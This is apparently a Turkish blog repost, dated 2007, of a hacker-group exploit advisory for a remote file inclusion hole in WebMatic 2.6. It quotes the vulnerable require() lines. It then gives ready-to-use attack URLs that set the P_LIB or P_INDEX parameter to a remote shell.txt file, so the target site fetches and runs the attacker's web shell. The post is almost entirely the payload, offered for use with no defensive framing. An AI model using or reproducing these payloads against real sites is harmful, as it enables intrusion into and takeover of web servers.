11 Mayıs 2007

WebMatic 2.6 RFI Açığı

-------------------------------------********************------------------------------------#Title : WebMatic 2.6
#Author : MadNet
#Contact : MadNet[at]Hackertr[Dot]org
#S.Page : www.valarsoft.com :)
--------------------------------------*******************-------------------------------------
Error1 : require($P_LIB."lib_album.php");Error2 : require($P_INDEX."page_album.inc");
[[RFI]]
http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]
http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]
-------------------------------------------------
Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt
Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt

''''''''''''''-- MadNet From Turkey & Cyber-Sabotage Orgeneral --'''''''''

Hiç yorum yok:

Yorum Gönder

Küfür ve hakaret içiren yorumlar silinmektedir.Lütfen hakaret ve küfür içeren yorumlar yazıpda bize iş çıkarmayın =))
Not: Yorum gönderden sonra güvenlik ekranı geldiğinden kodlamadan kaynaklanan bi hatadan ötürü eksik çıkmaktadır.Çıkan güvenlik ekranında yazınıza tıklayıp Tab tuşunu kullarak alt satırlara inebilirsiniz...